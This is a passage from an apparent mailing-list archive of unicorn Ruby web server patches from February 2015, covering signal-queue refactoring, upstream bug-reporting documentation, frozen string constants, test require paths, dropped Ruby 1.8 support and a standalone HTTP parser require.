     # Note that signals don't actually get handled until the #join method
-    QUEUE_SIGS.each { |sig| trap(sig) { SIG_QUEUE << sig; awaken_master } }
+    QUEUE_SIGS.each { |sig| trap(sig) { @sig_queue << sig; awaken_master } }
     trap(:CHLD) { awaken_master }
 
     # write pid early for Mongrel compatibility if we're not inheriting sockets
@@ -276,7 +269,7 @@ class Unicorn::HttpServer
     end
     begin
       reap_all_workers
-      case SIG_QUEUE.shift
+      case @sig_queue.shift
       when nil
         # avoid murdering workers after our master process (or the
         # machine) comes out of suspend/hibernation
@@ -335,7 +328,7 @@ class Unicorn::HttpServer
   def stop(graceful = true)
     self.listeners = []
     limit = time_now + timeout
-    until WORKERS.empty? || time_now > limit
+    until @workers.empty? || time_now > limit
       if graceful
         soft_kill_each_worker(:QUIT)
       else
@@ -376,13 +369,13 @@ class Unicorn::HttpServer
 
   # wait for a signal hander to wake us up and then consume the pipe
   def master_sleep(sec)
-    IO.select([ SELF_PIPE[0] ], nil, nil, sec) or return
-    SELF_PIPE[0].kgio_tryread(11)
+    IO.select([ @self_pipe[0] ], nil, nil, sec) or return
+    @self_pipe[0].kgio_tryread(11)
   end
 
   def awaken_master
     return if $$ != @master_pid
-    SELF_PIPE[1].kgio_trywrite('.') # wakeup master process from select
+    @self_pipe[1].kgio_trywrite('.') # wakeup master process from select
   end
 
   # reaps all unreaped workers
@@ -396,7 +389,7 @@ class Unicorn::HttpServer
         self.pid = pid.chomp('.oldbin') if pid
         proc_name 'master'
       else
-        worker = WORKERS.delete(wpid) and worker.close rescue nil
+        worker = @workers.delete(wpid) and worker.close rescue nil
         m = "reaped #{status.inspect} worker=#{worker.nr rescue 'unknown'}"
         status.success? ? logger.info(m) : logger.error(m)
       end
@@ -465,7 +458,7 @@ class Unicorn::HttpServer
   def murder_lazy_workers
     next_sleep = @timeout - 1
     now = time_now.to_i
-    WORKERS.dup.each_pair do |wpid, worker|
+    @workers.dup.each_pair do |wpid, worker|
       tick = worker.tick
       0 == tick and next # skip workers that haven't processed any clients
       diff = now - tick
@@ -483,7 +476,7 @@ class Unicorn::HttpServer
   end
 
   def after_fork_internal
-    SELF_PIPE.each(&:close).clear # this is master-only, now
+    @self_pipe.each(&:close).clear # this is master-only, now
     @ready_pipe.close if @ready_pipe
     Unicorn::Configurator::RACKUP.clear
     @ready_pipe = @init_listeners = @before_exec = @before_fork = nil
@@ -498,11 +491,11 @@ class Unicorn::HttpServer
   def spawn_missing_workers
     worker_nr = -1
     until (worker_nr += 1) == @worker_processes
-      WORKERS.value?(worker_nr) and next
-      worker = Worker.new(worker_nr)
+      @workers.value?(worker_nr) and next
+      worker = Unicorn::Worker.new(worker_nr)
       before_fork.call(self, worker)
       if pid = fork
-        WORKERS[pid] = worker
+        @workers[pid] = worker
         worker.atfork_parent
       else
         after_fork_internal
@@ -516,9 +509,9 @@ class Unicorn::HttpServer
   end
 
   def maintain_worker_count
-    (off = WORKERS.size - worker_processes) == 0 and return
+    (off = @workers.size - worker_processes) == 0 and return
     off < 0 and return spawn_missing_workers
-    WORKERS.each_value { |w| w.nr >= worker_processes and w.soft_kill(:QUIT) }
+    @workers.each_value { |w| w.nr >= worker_processes and w.soft_kill(:QUIT) }
   end
 
   # if we get any error, try to write something back to the client
@@ -597,13 +590,13 @@ class Unicorn::HttpServer
     worker.atfork_child
     # we'll re-trap :QUIT later for graceful shutdown iff we accept clients
     EXIT_SIGS.each { |sig| trap(sig) { exit!(0) } }
-    exit!(0) if (SIG_QUEUE & EXIT_SIGS)[0]
+    exit!(0) if (@sig_queue & EXIT_SIGS)[0]
     WORKER_QUEUE_SIGS.each { |sig| trap(sig, nil) }
     trap(:CHLD, 'DEFAULT')
-    SIG_QUEUE.clear
+    @sig_queue.clear
     proc_name "worker[#{worker.nr}]"
     START_CTX.clear
-    WORKERS.clear
+    @workers.clear
 
     after_fork.call(self, worker) # can drop perms and create listeners
     LISTENERS.each { |sock| sock.close_on_exec = true }
@@ -683,17 +676,17 @@ class Unicorn::HttpServer
   # is no longer running.
   def kill_worker(signal, wpid)
     Process.kill(signal, wpid)
-    rescue Errno::ESRCH
-      worker = WORKERS.delete(wpid) and worker.close rescue nil
+  rescue Errno::ESRCH
+    worker = @workers.delete(wpid) and worker.close rescue nil
   end
 
   # delivers a signal to each worker
   def kill_each_worker(signal)
-    WORKERS.keys.each { |wpid| kill_worker(signal, wpid) }
+    @workers.keys.each { |wpid| kill_worker(signal, wpid) }
   end
 
   def soft_kill_each_worker(signal)
-    WORKERS.each_value { |worker| worker.soft_kill(signal) }
+    @workers.each_value { |worker| worker.soft_kill(signal) }
   end
 
   # unlinks a PID file at given +path+ if it contains the current PID
-- 
EW


^ permalink raw reply related	[relevance 8%]

* Re: [PATCH] ISSUES: add section for bugs in other projects
  2015-02-10 17:06  6% [PATCH] ISSUES: add section for bugs in other projects Eric Wong
@ 2015-02-10 17:26 14% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-02-10 17:26 UTC (permalink / raw)
  To: unicorn-public

Squashing the following, since we don't want things sinkholed
or missed:

--- a/ISSUES
+++ b/ISSUES
@@ -6,7 +6,7 @@ submit patches and/or obtain support after you have searched the
 {documentation}[http://unicorn.bogomips.org/].
 
 * No subscription will ever be required to email the public inbox.
-* Please Cc: all participants in a thread, as subscription is optional
+* Cc: all participants in a thread or commit, as subscription is optional
 * Do not {top post}[http://catb.org/jargon/html/T/top-post.html] in replies
 * Quote as little as possible of the message you're replying to
 * Do not send HTML mail, it will likely be flagged as spam
@@ -39,9 +39,13 @@ but their mailing list remains operational.
 
 Uncommon bugs we encounter in the Linux kernel should be Cc:-ed to the
 Linux kernel mailing list (LKML) at mailto:linux-kernel@vger.kernel.org
-and other kernel lists such as mailto:netdev@vger.kernel.org
-(for networking issues).  No subscription is necessary, and the our
-mailing list follows the same conventions as LKML for interopability.
+and subsystem maintainers such as mailto:netdev@vger.kernel.org
+(for networking issues).  It is expected practice to Cc: anybody
+involved with any problematic commits (including those in the
+Signed-off-by: and other trailer lines).  No subscription is necessary,
+and the our mailing list follows the same conventions as LKML for
+interopability.  There is a kernel.org Bugzilla instance, but it is
+ignored by most developers.
 
 Likewise for any rare glibc bugs we might encounter, we should Cc:
 mailto:libc-alpha@sourceware.org

^ permalink raw reply	[relevance 14%]

* [PATCH] ISSUES: add section for bugs in other projects
@ 2015-02-10 17:06  6% Eric Wong
  2015-02-10 17:26 14% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2015-02-10 17:06 UTC (permalink / raw)
  To: unicorn-public

This is not anything new, just documenting what has been going
on since the beginning.

There have been a small number of generic networking (or mm) bugs in
the kernel which affect unicorn, but they are usually found and fixed
with more popular, non-Ruby servers first.

Aside from generic performance problems, I don't think there's ever
been a glibc bug which affected unicorn.
---
 ISSUES | 30 ++++++++++++++++++++++++++++++
 1 file changed, 30 insertions(+)

diff --git a/ISSUES b/ISSUES
index f66d14a..343cab4 100644
--- a/ISSUES
+++ b/ISSUES
@@ -18,6 +18,36 @@ instead and your issue will be handled discreetly.
 If you don't get a response within a few days, we may have forgotten
 about it so feel free to ask again.
 
+== Bugs in related projects
+
+unicorn is sometimes affected by bugs in its dependencies.  Bugs
+triggered by unicorn in mainline Ruby, rack, GNU C library (glibc),
+or the Linux kernel will be reported upstream and fixed.
+
+For bugs in Ruby itself, we may forward bugs to
+https://bugs.ruby-lang.org/ and discuss+fix them on the ruby-core
+list at mailto:ruby-core@ruby-lang.org
+Subscription to post is required to ruby-core, unfortunately:
+mailto:ruby-core-request@ruby-lang.org?subject=subscribe
+
+For uncommon bugs in Rack, we may forward bugs to
+mailto:rack-devel@googlegroups.com and discuss there.
+Subscription (without any web UI or Google account) is possible via:
+mailto:rack-devel+subscribe@googlegroups.com
+Note: not everyone can use the proprietary bug tracker used by Rack,
+but their mailing list remains operational.
+
+Uncommon bugs we encounter in the Linux kernel should be Cc:-ed to the
+Linux kernel mailing list (LKML) at mailto:linux-kernel@vger.kernel.org
+and other kernel lists such as mailto:netdev@vger.kernel.org
+(for networking issues).  No subscription is necessary, and the our
+mailing list follows the same conventions as LKML for interopability.
+
+Likewise for any rare glibc bugs we might encounter, we should Cc:
+mailto:libc-alpha@sourceware.org
+Keep in mind glibc upstream does use Bugzilla for tracking bugs:
+https://sourceware.org/bugzilla/
+
 == Submitting Patches
 
 See the HACKING document (and additionally, the
-- 
EW

^ permalink raw reply related	[relevance 6%]

* [PATCH 2/2] reduce and localize constant string use
  @ 2015-02-09  9:12  6% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-02-09  9:12 UTC (permalink / raw)
  To: unicorn-public

Literal String#freeze avoids allocations since Ruby 2.1 via the
opt_str_freeze instruction, so we can start relying on it in
some places as Ruby 2.1 adoption increases.  The 100-continue
handling is a good place to start since it is an uncommonly-used
code path which benefits from size reduction and the negative
performance impact is restricted to a handful of users.

HTTP_RESPONSE_START can safely live in http_request.rb as its
usage does not cross namespace boundaries.

The goal is to eventually eliminate Unicorn::Const entirely.
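
For illustration (not part of the diff below), the allocation behavior
this relies on looks like the following under Ruby 2.1+:

    # a literal "...".freeze compiles to opt_str_freeze, so one frozen
    # String is reused instead of allocating a new object on every call
    def frozen_100
      "HTTP/1.1 100 Continue\r\n\r\n".freeze
    end

    def unfrozen_100
      "HTTP/1.1 100 Continue\r\n\r\n"
    end

    frozen_100.equal?(frozen_100)     # => true  (same object every call)
    unfrozen_100.equal?(unfrozen_100) # => false (new String every call)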
---
 lib/unicorn/const.rb        | 17 +----------------
 lib/unicorn/http_request.rb |  5 ++++-
 lib/unicorn/http_server.rb  | 18 ++++++++++--------
 3 files changed, 15 insertions(+), 25 deletions(-)

diff --git a/lib/unicorn/const.rb b/lib/unicorn/const.rb
index e24b511..33ab4ac 100644
--- a/lib/unicorn/const.rb
+++ b/lib/unicorn/const.rb
@@ -1,12 +1,6 @@
 # -*- encoding: binary -*-
 
-# :enddoc:
-# Frequently used constants when constructing requests or responses.
-# Many times the constant just refers to a string with the same
-# contents.  Using these constants gave about a 3% to 10% performance
-# improvement over using the strings directly.  Symbols did not really
-# improve things much compared to constants.
-module Unicorn::Const
+module Unicorn::Const # :nodoc:
   # default TCP listen host address (0.0.0.0, all interfaces)
   DEFAULT_HOST = "0.0.0.0"
 
@@ -23,14 +17,5 @@ module Unicorn::Const
   # temporary file for reading (112 kilobytes).  This is the default
   # value of client_body_buffer_size.
   MAX_BODY = 1024 * 112
-
-  # :stopdoc:
-  EXPECT_100_RESPONSE = "HTTP/1.1 100 Continue\r\n\r\n"
-  EXPECT_100_RESPONSE_SUFFIXED = "100 Continue\r\n\r\nHTTP/1.1 "
-
-  HTTP_RESPONSE_START = ['HTTP', '/1.1 ']
-  HTTP_EXPECT = "HTTP_EXPECT"
-
-  # :startdoc:
 end
 require_relative 'version'
diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
index 6b20431..9888430 100644
--- a/lib/unicorn/http_request.rb
+++ b/lib/unicorn/http_request.rb
@@ -26,8 +26,11 @@ class Unicorn::HttpParser
 
   # :stopdoc:
   # A frozen format for this is about 15% faster
+  # Drop these frozen strings when Ruby 2.2 becomes more prevalent,
+  # 2.2+ optimizes hash assignments when used with literal string keys
   REMOTE_ADDR = 'REMOTE_ADDR'.freeze
   RACK_INPUT = 'rack.input'.freeze
+  HTTP_RESPONSE_START = [ 'HTTP', '/1.1 ']
   @@input_class = Unicorn::TeeInput
   @@check_client_connection = false
 
@@ -86,7 +89,7 @@ class Unicorn::HttpParser
     # detect if the socket is valid by writing a partial response:
     if @@check_client_connection && headers?
       @response_start_sent = true
-      Unicorn::Const::HTTP_RESPONSE_START.each { |c| socket.write(c) }
+      HTTP_RESPONSE_START.each { |c| socket.write(c) }
     end
 
     e[RACK_INPUT] = 0 == content_length ?
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index c44a71e..f0216d0 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -546,12 +546,15 @@ class Unicorn::HttpServer
     rescue
   end
 
-  def expect_100_response
-    if @request.response_start_sent
-      Unicorn::Const::EXPECT_100_RESPONSE_SUFFIXED
-    else
-      Unicorn::Const::EXPECT_100_RESPONSE
-    end
+  def e100_response_write(client, env)
+    # We use String#freeze to avoid allocations under Ruby 2.1+
+    # Not many users hit this code path, so it's better to reduce the
+    # constant table sizes even for 1.9.3-2.0 users who'll hit extra
+    # allocations here.
+    client.write(@request.response_start_sent ?
+                 "100 Continue\r\n\r\nHTTP/1.1 ".freeze :
+                 "HTTP/1.1 100 Continue\r\n\r\n".freeze)
+    env.delete('HTTP_EXPECT'.freeze)
   end
 
   # once a client is accepted, it is processed in its entirety here
@@ -561,8 +564,7 @@ class Unicorn::HttpServer
     return if @request.hijacked?
 
     if 100 == status.to_i
-      client.write(expect_100_response)
-      env.delete(Unicorn::Const::HTTP_EXPECT)
+      e100_response_write(client, env)
       status, headers, body = @app.call(env)
       return if @request.hijacked?
     end
-- 
EW


^ permalink raw reply related	[relevance 6%]

* [PATCH] fix uninstalled testing and reduce require paths
@ 2015-02-06 22:17  4% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-02-06 22:17 UTC (permalink / raw)
  To: unicorn-public; +Cc: Eric Wong

This fixes a bug introduced in
commit fe83ead4eae6f011fa15f506cd80cb4256813a92
(GNUmakefile: fix clean gem build + reduce build cruft)
which broke clean Ruby installations without an existing
unicorn gem installed :x
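
Background note, not part of the change itself: the RUBYLIB hunk below
drops $(test_prefix) (the tree root) from the load path, and "." has not
been in $LOAD_PATH since Ruby 1.9.2, so the tests switch to explicit
"./" requires which resolve against the working directory instead:

    # assuming the working directory is an unpacked source tree
    require 'test/test_helper'    # needs the tree root on RUBYLIB or -I
    require './test/test_helper'  # resolved via Dir.pwd, no -I needed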
---
 GNUmakefile                      | 10 +++++++---
 test/exec/test_exec.rb           |  2 +-
 test/unit/test_http_parser.rb    |  2 +-
 test/unit/test_http_parser_ng.rb |  2 +-
 test/unit/test_request.rb        |  2 +-
 test/unit/test_response.rb       |  2 +-
 test/unit/test_server.rb         |  2 +-
 test/unit/test_signals.rb        |  2 +-
 test/unit/test_socket_helper.rb  |  2 +-
 test/unit/test_upload.rb         |  2 +-
 test/unit/test_util.rb           |  2 +-
 11 files changed, 17 insertions(+), 13 deletions(-)

diff --git a/GNUmakefile b/GNUmakefile
index 8bd63ee..2995a6b 100644
--- a/GNUmakefile
+++ b/GNUmakefile
@@ -59,13 +59,17 @@ $(ext)/unicorn_http.$(DLEXT): $(ext)/Makefile
 	$(MAKE) -C $(@D)
 http: $(ext)/unicorn_http.$(DLEXT)
 
+# only used for tests
+http-install: $(ext)/unicorn_http.$(DLEXT)
+	install -m644 $< lib/
+
 test-install: $(test_prefix)/.stamp
 $(test_prefix)/.stamp: $(inst_deps)
 	mkdir -p $(test_prefix)/.ccache
 	tar cf - $(inst_deps) GIT-VERSION-GEN | \
 	  (cd $(test_prefix) && tar xf -)
 	$(MAKE) -C $(test_prefix) clean
-	$(MAKE) -C $(test_prefix) http shebang RUBY="$(RUBY)"
+	$(MAKE) -C $(test_prefix) http-install shebang RUBY="$(RUBY)"
 	> $@
 
 # this is only intended to be run within $(test_prefix)
@@ -119,14 +123,14 @@ run_test = $(quiet_pre) \
 %.n: arg = $(subst .n,,$(subst --, -n ,$@))
 %.n: t = $(subst .n,$(log_suffix),$@)
 %.n: export PATH := $(test_prefix)/bin:$(PATH)
-%.n: export RUBYLIB := $(test_prefix):$(test_prefix)/lib:$(MYLIBS)
+%.n: export RUBYLIB := $(test_prefix)/lib:$(MYLIBS)
 %.n: $(test_prefix)/.stamp
 	$(run_test)
 
 $(T): arg = $@
 $(T): t = $(subst .rb,$(log_suffix),$@)
 $(T): export PATH := $(test_prefix)/bin:$(PATH)
-$(T): export RUBYLIB := $(test_prefix):$(test_prefix)/lib:$(MYLIBS)
+$(T): export RUBYLIB := $(test_prefix)/lib:$(MYLIBS)
 $(T): $(test_prefix)/.stamp
 	$(run_test)
 
diff --git a/test/exec/test_exec.rb b/test/exec/test_exec.rb
index 10a1bae..6deb96b 100644
--- a/test/exec/test_exec.rb
+++ b/test/exec/test_exec.rb
@@ -2,7 +2,7 @@
 
 # Copyright (c) 2009 Eric Wong
 FLOCK_PATH = File.expand_path(__FILE__)
-require 'test/test_helper'
+require './test/test_helper'
 
 do_test = true
 $unicorn_bin = ENV['UNICORN_TEST_BIN'] || "unicorn"
diff --git a/test/unit/test_http_parser.rb b/test/unit/test_http_parser.rb
index 2251dcf..431ede5 100644
--- a/test/unit/test_http_parser.rb
+++ b/test/unit/test_http_parser.rb
@@ -7,7 +7,7 @@
 # Additional work donated by contributors.  See git history
 # for more information.
 
-require 'test/test_helper'
+require './test/test_helper'
 
 include Unicorn
 
diff --git a/test/unit/test_http_parser_ng.rb b/test/unit/test_http_parser_ng.rb
index d5c8d2e..0c81072 100644
--- a/test/unit/test_http_parser_ng.rb
+++ b/test/unit/test_http_parser_ng.rb
@@ -1,6 +1,6 @@
 # -*- encoding: binary -*-
 
-require 'test/test_helper'
+require './test/test_helper'
 require 'digest/md5'
 
 include Unicorn
diff --git a/test/unit/test_request.rb b/test/unit/test_request.rb
index fbda1a2..f0ccaf7 100644
--- a/test/unit/test_request.rb
+++ b/test/unit/test_request.rb
@@ -4,7 +4,7 @@
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
 # the GPLv2+ (GPLv3+ preferred)
 
-require 'test/test_helper'
+require './test/test_helper'
 
 include Unicorn
 
diff --git a/test/unit/test_response.rb b/test/unit/test_response.rb
index bdca9f5..d0f0c79 100644
--- a/test/unit/test_response.rb
+++ b/test/unit/test_response.rb
@@ -7,7 +7,7 @@
 # Additional work donated by contributors.  See git history
 # for more information.
 
-require 'test/test_helper'
+require './test/test_helper'
 require 'time'
 
 include Unicorn
diff --git a/test/unit/test_server.rb b/test/unit/test_server.rb
index 9c92bab..8b3afad 100644
--- a/test/unit/test_server.rb
+++ b/test/unit/test_server.rb
@@ -7,7 +7,7 @@
 # Additional work donated by contributors.  See git history
 # for more information.
 
-require 'test/test_helper'
+require './test/test_helper'
 
 include Unicorn
 
diff --git a/test/unit/test_signals.rb b/test/unit/test_signals.rb
index 443c736..4592819 100644
--- a/test/unit/test_signals.rb
+++ b/test/unit/test_signals.rb
@@ -6,7 +6,7 @@
 #
 # Ensure we stay sane in the face of signals being sent to us
 
-require 'test/test_helper'
+require './test/test_helper'
 
 include Unicorn
 
diff --git a/test/unit/test_socket_helper.rb b/test/unit/test_socket_helper.rb
index 994b990..8b09198 100644
--- a/test/unit/test_socket_helper.rb
+++ b/test/unit/test_socket_helper.rb
@@ -1,6 +1,6 @@
 # -*- encoding: binary -*-
 
-require 'test/test_helper'
+require './test/test_helper'
 require 'tempfile'
 
 class TestSocketHelper < Test::Unit::TestCase
diff --git a/test/unit/test_upload.rb b/test/unit/test_upload.rb
index bcce4bc..5de02e4 100644
--- a/test/unit/test_upload.rb
+++ b/test/unit/test_upload.rb
@@ -1,7 +1,7 @@
 # -*- encoding: binary -*-
 
 # Copyright (c) 2009 Eric Wong
-require 'test/test_helper'
+require './test/test_helper'
 require 'digest/md5'
 
 include Unicorn
diff --git a/test/unit/test_util.rb b/test/unit/test_util.rb
index 904d51c..4d17a16 100644
--- a/test/unit/test_util.rb
+++ b/test/unit/test_util.rb
@@ -1,6 +1,6 @@
 # -*- encoding: binary -*-
 
-require 'test/test_helper'
+require './test/test_helper'
 require 'tempfile'
 
 class TestUtil < Test::Unit::TestCase
-- 
EW


^ permalink raw reply related	[relevance 4%]

* [PATCH] doc: update support status for Ruby versions
@ 2015-02-06 20:15  3% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-02-06 20:15 UTC (permalink / raw)
  To: unicorn-public

unicorn 5 will not support Ruby 1.8 anymore.

Drop mentions of Rubinius, too, it's too difficult to support due to
the proprietary and registration-required nature of its bug tracker.
The smaller memory footprint and CoW-friendly memory allocator in
mainline Ruby are a better fit for unicorn, anyway.

Since Ruby 1.9+ bundles RubyGems and gem startup is faster nowadays,
we'll just depend on that instead of not loading RubyGems.

Drop the local.mk.sample file, too, since it's way out-of-date
and probably isn't useful (I have not used it in a while).
---
 HACKING                         | 23 +++-------------
 KNOWN_ISSUES                    | 20 +++++++-------
 README                          |  3 ++-
 Sandbox                         |  2 +-
 lib/unicorn/configurator.rb     |  2 --
 lib/unicorn/http_server.rb      |  4 +--
 local.mk.sample                 | 59 -----------------------------------------
 t/README                        |  2 +-
 test/unit/test_socket_helper.rb |  4 +--
 9 files changed, 22 insertions(+), 97 deletions(-)
 delete mode 100644 local.mk.sample

diff --git a/HACKING b/HACKING
index 9b4da1b..6c5f897 100644
--- a/HACKING
+++ b/HACKING
@@ -19,13 +19,6 @@ RubyGems.
 Users of GNU-based systems (such as GNU/Linux) usually have GNU make
 installed as "make" instead of "gmake".
 
-Since we don't load RubyGems by default, loading Rack properly requires
-setting up RUBYLIB to point to where Rack is located.  Not loading
-RubyGems drastically lowers the time to run the full test suite.  You
-may setup a "local.mk" file in the top-level working directory to setup
-your RUBYLIB and any other environment variables.  A "local.mk.sample"
-file is provided for reference.
-
 Running the entire test suite with 4 tests in parallel:
 
   gmake -j4 check
@@ -70,10 +63,9 @@ becomes unavailable.
 
 === Ruby/C Compatibility
 
-We target Ruby 1.8.6+, 1.9 and will target Rubinius as it becomes
-production-ready.  We need the Ruby implementation to support fork,
-exec, pipe, UNIX signals, access to integer file descriptors and
-ability to use unlinked files.
+We target mainline Ruby 1.9.3 and later.  We need the Ruby
+implementation to support fork, exec, pipe, UNIX signals, access to
+integer file descriptors and ability to use unlinked files.
 
 All of our C code is OS-independent and should run on compilers
 supported by the versions of Ruby we target.
@@ -123,13 +115,6 @@ You can build the Unicorn gem with the following command:
 
 It is easy to install the contents of your git working directory:
 
-Via RubyGems (RubyGems 1.3.5+ recommended for prerelease versions):
+Via RubyGems
 
   gmake install-gem
-
-Without RubyGems (via setup.rb):
-
-  gmake install
-
-It is not at all recommended to mix a RubyGems installation with an
-installation done without RubyGems, however.
diff --git a/KNOWN_ISSUES b/KNOWN_ISSUES
index 38263e7..69e4f57 100644
--- a/KNOWN_ISSUES
+++ b/KNOWN_ISSUES
@@ -17,16 +17,6 @@ acceptable solution.  Those issues are documented here.
   have builtin workarounds for Kernel#rand and OpenSSL::Random users,
   but applications may use other PRNGs.
 
-* Under some versions of Ruby 1.8, it is necessary to call +srand+ in an
-  after_fork hook to get correct random number generation.  We have a builtin
-  workaround for this starting with \Unicorn 3.6.1
-
-  See http://redmine.ruby-lang.org/issues/show/4338
-
-* On Ruby 1.8 prior to Ruby 1.8.7-p248, *BSD platforms have a broken
-  stdio that causes failure for file uploads larger than 112K.  Upgrade
-  your version of Ruby or continue using Unicorn 1.x/3.4.x.
-
 * For notes on sandboxing tools such as Bundler or Isolate,
   see the {Sandbox}[link:Sandbox.html] page.
 
@@ -44,6 +34,16 @@ acceptable solution.  Those issues are documented here.
 
 == Known Issues (Old)
 
+* Under some versions of Ruby 1.8, it is necessary to call +srand+ in an
+  after_fork hook to get correct random number generation.  We have a builtin
+  workaround for this starting with \Unicorn 3.6.1
+
+  See http://redmine.ruby-lang.org/issues/show/4338
+
+* On Ruby 1.8 prior to Ruby 1.8.7-p248, *BSD platforms have a broken
+  stdio that causes failure for file uploads larger than 112K.  Upgrade
+  your version of Ruby or continue using Unicorn 1.x/3.4.x.
+
 * Under Ruby 1.9.1, methods like Array#shuffle and Array#sample will
   segfault if called after forking.  Upgrade to Ruby 1.9.2 or call
   "Kernel.rand" in your after_fork hook to reinitialize the random
diff --git a/README b/README
index 02d01e1..f084d0c 100644
--- a/README
+++ b/README
@@ -12,7 +12,8 @@ both the the request and response in between \Unicorn and slow clients.
   cut out everything that is better supported by the operating system,
   {nginx}[http://nginx.net/] or {Rack}[http://rack.github.io/].
 
-* Compatible with Ruby 1.8 and later.  Rubinius support is in-progress.
+* Compatible with Ruby 1.9.3 and later.
+  unicorn 4.8.x will remain supported for Ruby 1.8 users.
 
 * Process management: \Unicorn will reap and restart workers that
   die from broken apps.  There is no need to manage multiple processes
diff --git a/Sandbox b/Sandbox
index 3c7f226..f662b27 100644
--- a/Sandbox
+++ b/Sandbox
@@ -86,7 +86,7 @@ For now workarounds include doing one of the following:
 
 3. Explicitly setting RUBYLIB or $LOAD_PATH to include any gem path
    where the unicorn gem is installed
-   (e.g. /usr/lib/ruby/gems/1.9.1/gems/unicorn-VERSION/lib)
+   (e.g. /usr/lib/ruby/gems/1.9.3/gems/unicorn-VERSION/lib)
 
 === RUBYOPT pollution from SIGUSR2 upgrades
 
diff --git a/lib/unicorn/configurator.rb b/lib/unicorn/configurator.rb
index d14e608..69b4644 100644
--- a/lib/unicorn/configurator.rb
+++ b/lib/unicorn/configurator.rb
@@ -306,8 +306,6 @@ class Unicorn::Configurator
   #   to receive IPv4 queries on dual-stack systems.  A separate IPv4-only
   #   listener is required if this is true.
   #
-  #   This option is only available for Ruby 1.9.2 and later.
-  #
   #   Enabling this option for the IPv6-only listener and having a
   #   separate IPv4 listener is recommended if you wish to support IPv6
   #   on the same TCP port.  Otherwise, the value of \env[\"REMOTE_ADDR\"]
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 95a8ffe..895f56d 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -67,7 +67,7 @@ class Unicorn::HttpServer
   # you can set the following in your Unicorn config file, HUP and then
   # continue with the traditional USR2 + QUIT upgrade steps:
   #
-  #   Unicorn::HttpServer::START_CTX[0] = "/home/bofh/1.9.2/bin/unicorn"
+  #   Unicorn::HttpServer::START_CTX[0] = "/home/bofh/2.2.0/bin/unicorn"
   START_CTX = {
     :argv => ARGV.map { |arg| arg.dup },
     0 => $0.dup,
@@ -453,7 +453,7 @@ class Unicorn::HttpServer
 
       # exec(command, hash) works in at least 1.9.1+, but will only be
       # required in 1.9.4/2.0.0 at earliest.
-      cmd << listener_fds if RUBY_VERSION >= "1.9.1"
+      cmd << listener_fds
       logger.info "executing #{cmd.inspect} (in #{Dir.pwd})"
       before_exec.call(self)
       exec(*cmd)
diff --git a/local.mk.sample b/local.mk.sample
deleted file mode 100644
index 25bca5d..0000000
diff --git a/t/README b/t/README
index 095f106..bcaf3ce 100644
--- a/t/README
+++ b/t/README
@@ -10,7 +10,7 @@ comfortable writing integration tests with.
 
 == Requirements
 
-* {Ruby 1.8 or 1.9}[http://www.ruby-lang.org/] (duh!)
+* {Ruby 1.9.3+}[https://www.ruby-lang.org/] (duh!)
 * {GNU make}[http://www.gnu.org/software/make/]
 * {socat}[http://www.dest-unreach.org/socat/]
 * {curl}[http://curl.haxx.se/]
diff --git a/test/unit/test_socket_helper.rb b/test/unit/test_socket_helper.rb
index dd6881c..994b990 100644
--- a/test/unit/test_socket_helper.rb
+++ b/test/unit/test_socket_helper.rb
@@ -182,8 +182,8 @@ class TestSocketHelper < Test::Unit::TestCase
     sock = bind_listen "[#@test6_addr]:#{port}", :ipv6only => true
     cur = sock.getsockopt(:IPPROTO_IPV6, :IPV6_V6ONLY).unpack('i')[0]
     assert_equal 1, cur
-    rescue Errno::EAFNOSUPPORT
-  end if RUBY_VERSION >= "1.9.2"
+  rescue Errno::EAFNOSUPPORT
+  end
 
   def test_reuseport
     port = unused_port @test_addr
-- 
EW

^ permalink raw reply related	[relevance 3%]

* [PATCH] http: standalone require + reduction in binary size
@ 2015-02-04 20:16  2% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-02-04 20:16 UTC (permalink / raw)
  To: unicorn-public

This allows requiring just the C extension part of "unicorn_http",
without requiring the rest of unicorn, allowing other HTTP servers
using the same parser to be slimmer.

On my x86-64 Debian 7.0 system:

    text	   data	    bss	    dec	    hex	filename
   44026	   1976	    488	  46490	   b59a	lib/unicorn_http.so
   43930	   1976	    456	  46362	   b51a	lib/unicorn_http.so
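
The new test-require target below exercises this; done by hand it
amounts to something like (paths assumed relative to the source tree):

    # load only the compiled parser, no "require 'unicorn'" beforehand
    $LOAD_PATH.unshift 'ext/unicorn_http'  # directory with unicorn_http.so
    require 'unicorn_http'
    p Unicorn::HttpParser  # the extension now defines the Unicorn module itself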
---
 GNUmakefile                      | 5 ++++-
 ext/unicorn_http/httpdate.c      | 2 +-
 ext/unicorn_http/unicorn_http.rl | 2 +-
 3 files changed, 6 insertions(+), 3 deletions(-)

diff --git a/GNUmakefile b/GNUmakefile
index d7f0118..4c40dc9 100644
--- a/GNUmakefile
+++ b/GNUmakefile
@@ -85,10 +85,13 @@ test-unit: $(wildcard test/unit/test_*.rb)
 $(slow_tests): $(test_prefix)/.stamp
 	@$(MAKE) $(shell $(awk_slow) $@)
 
+test-require: $(ext)/unicorn_http.$(DLEXT)
+	$(RUBY) --disable-gems -I$(ext) -runicorn_http -e Unicorn
+
 test-integration: $(test_prefix)/.stamp
 	$(MAKE) -C t
 
-check: test test-integration
+check: test-require test test-integration
 test-all: check
 
 TEST_OPTS = -v
diff --git a/ext/unicorn_http/httpdate.c b/ext/unicorn_http/httpdate.c
index bf54fdd..0a1045f 100644
--- a/ext/unicorn_http/httpdate.c
+++ b/ext/unicorn_http/httpdate.c
@@ -66,7 +66,7 @@ static VALUE httpdate(VALUE self)
 
 void init_unicorn_httpdate(void)
 {
-	VALUE mod = rb_const_get(rb_cObject, rb_intern("Unicorn"));
+	VALUE mod = rb_define_module("Unicorn");
 	mod = rb_define_module_under(mod, "HttpResponse");
 
 	buf = rb_str_new(0, buf_capa - 1);
